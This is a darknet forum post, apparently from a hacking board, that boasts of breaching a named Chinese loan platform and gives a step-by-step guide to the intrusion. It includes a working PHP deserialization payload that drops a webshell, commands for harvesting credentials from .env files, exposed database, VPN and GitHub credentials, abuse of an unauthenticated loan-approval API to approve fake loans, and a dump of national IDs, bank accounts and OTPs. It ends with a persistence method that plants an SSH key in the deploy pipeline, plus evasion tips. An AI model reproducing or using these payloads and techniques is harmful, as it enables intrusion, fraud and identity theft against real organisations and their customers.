[OPSEC] How I Quietly Breached a Chinese Loan Site Without Making Noise [Target Overview] : hacking | Torhoo darknet markets

Target was a loan platform widely used in CN. The domain? Think d a u x i a o m a n [dot] com. They run mobile, finance portals, and some shit APIs devs forgot to lock down.
Also had staging systems floating around with piss-poor security.

Didn’t come in loud. I didn’t scan like a bot. I sat back, watched, waited.

[Step 1 – Watching Their Mobile Shit]
Grabbed their APK straight from the mobile endpoint. (No link, but you know where to find those.)
Decompiled using JADX.

They weren’t using JSON like normal folks. They were pushing raw serialized PHP objects inside mobile API calls.
Nobody checks that shit anymore. It’s like they were begging.

Example call:

POST to /api/v1/loanStatus
Content-Type: application/octet-stream
Payload: base64 string
That was my way in.

[Step 2 – Smashing Deserialization]
Tested it with garbage data. Boom – backend started leaking class names.

Spotted a Logger class. It had a writable file path and a __destruct function.

Quickly cooked:

O:7:"Logger":2:{s:4:"file";s:13:"/tmp/x.php";s:7:"content";s:20:"<?php system($_GET[c]); ?>";}
Base64’d it, threw it into the API.
Silent 200 response. No errors. No blocks.

I hit the finance subdomain directly at:
finance[.]d a u x i a o m a n[.]com → /tmp/x[.]php

Shell was there.
Wide open.
No WAF. No rate limits. No nothing.

[Step 3 – Slow Crawl]
Didn’t rush DBs. That’s a rookie move. Instead, I slowly walked the box.

Ran:


find / -name "*.env" 2>/dev/null
Found creds sitting under /opt/deploy/.env

Inside:

DB_USER=root
DB_PASS=d a u x i a o 2 0 2 5
INTERNAL_VPN_USER=devstage
INTERNAL_VPN_PASS=stagingpass123
GITHUB_TOKEN=ghp_shitexposed
Also found notes.txt with staging VPN guides and internal IP ranges. Devs were writing down their own fuckups.

[Step 4 – CI/CD Spill]
Used their leaked GitHub token. Accessed their private backend repo (no MFA, good job boys).
Repo had:

Docker setup

Redis keys

Full backend source

Hardcoded internal APIs

Spotted one that made me laugh:
hxxp://10[.]0[.]0[.]5:8000/internal/loan/approve

Yup. An internal loan approval API.
No login. No token. No signature.

[Step 5 – VPN Ride]
Staging VPN wasn’t IP-restricted.
I connected like I was one of their devs.

Used:

openvpn --config staging.ovpn --auth-user-pass creds.txt
Boom, staging net access.

What I reached:

Internal APIs

Staging MySQL

CI/CD runners

They were reusing the same MySQL root creds:

mysql -h 10[.]0[.]0[.]5 -u root -p
No password rotation, nothing.

[Step 6 – API Abuse]
Hit the internal loan approval API. No auth. No checks.

Sample POST:

POST /loan/approve

{
"loan_id": 10981,
"status": "approved",
"amount": "500000"
}
It happily approved fake loans.
I could’ve auto-approved thousands with a bash loop if I wanted.

[Step 7 – Database Walk]
Dumped:

User IDs

National IDs

Bank accounts

Selfies with IDs

SMS OTP logs

Yup, they were storing SMS OTPs in plain text.
For "debugging" they said in some commit message.

Saw entries like:

yaml
Copy
Edit
user_id | phone | otp_code
1001 | +86-138xxxx | 882731
Idiots.

[Step 8 – Staying In]
Injected my SSH key into their deploy scripts.
Every time they pushed code, I got re-injected automatically.

No more webshells needed.
I became part of their pipeline.

[Step 9 – Clean Exit]
Didn’t touch logs.
Didn’t delete anything.

I just blended in by pushing lots of normal-looking loan traffic.
Left my VPN config zipped inside /var/backups with a random name.

You don’t need to hide if you look like part of the furniture.

[Why Noobs Would’ve Missed This]
SQLi? Nah.

Burp Suite default scans? Nope.

VPNs don’t show up in Shodan.

CI/CD abuse doesn’t pop up in basic bug bounties.